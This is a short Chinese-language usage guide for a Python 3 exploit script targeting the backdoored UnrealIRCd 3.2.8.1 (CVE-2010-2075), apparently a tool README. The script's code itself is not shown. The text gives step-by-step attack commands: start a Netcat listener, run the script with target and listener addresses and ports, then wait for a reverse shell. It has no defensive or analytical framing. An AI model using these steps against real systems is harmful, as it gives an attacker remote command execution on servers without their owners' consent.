UnrealIRCd 3.2.8.1 后门命令执行漏洞,Python 3 利用脚本(CVE-2010-2075)。
UnrealIRCd 3.2.8.1 版本包含一个特洛伊木马,允许远程攻击者执行任意命令(CVE-2010-2075)。
我参考了 Metasploit 的载荷 payload/cmd/unix/reverse_perl 来编写此脚本。
在监听主机上启动 Netcat 监听器:
nc -lp 4444
执行脚本,提供以下位置参数:
python3 script.py <target> <tport> <listener> <lport>
<target> 目标主机 IP 地址。<tport> 目标主机端口号。<listener> 监听主机 IP 地址。<lport> 监听主机端口号。在你的本地机器上设置 Netcat 监听器:
nc -lp 4444
对目标机器 192.168.1.3 TCP 端口 6697 运行脚本:
python3 script.py 192.168.1.3 6697 192.168.1.2 4444
等待一分钟,Netcat 监听器应当收到一个反弹 shell。